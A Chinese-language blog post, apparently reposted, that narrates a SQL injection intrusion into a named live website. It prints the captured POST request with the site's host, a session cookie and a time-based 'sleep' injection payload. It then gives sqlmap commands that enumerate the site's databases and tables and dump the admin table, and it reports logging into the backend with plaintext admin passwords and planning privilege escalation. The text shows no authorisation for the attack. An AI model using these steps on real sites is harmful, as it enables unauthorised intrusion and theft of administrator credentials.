滲透日記-POST注入


  今晚給一個網站做了一次入侵檢測,首先進行信息刺探后,發現這個站有注入策略,所有頁面都沒法通過常規的注入,利用wvs掃描網站發現一個頁面。

這個頁面直接暴露出了錯誤信息,看了一下url沒有參數卻爆出了錯誤,感覺post能注入,於是抓包修改header分析了一下

Request
POST /medresult.php HTTP/1.1
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2ah1ottpdkcj0jgip9lgl54891
Host: www.zgyijing.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*

lm=5 and sleep(2)

發現這個頁面存在SQL注入漏洞,還是POST類型的注入漏洞,防了GET注入但是沒有防御POST注入,於是乎。。。跑一下sqlmap

格式為:sqlmap -u http://www.xxxxx.com  --data "lm=1"

發現確實是存在注入的,於是乎。。。 把表爆出來找關鍵的表

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" --dbs

  發現一個關鍵信息的表,這個站用的庫就是 vps051,於是乎把vps051這個哭的表爆出來

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" -D vps051 --tables

  英語好點的同學應該猜測到管理員的表應該是master,爆出管理的表

  密碼竟然是明文的,省去了破解的功夫,這下得到了管理的密碼,登錄網站后台

  接下來就可以考慮提權了。。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM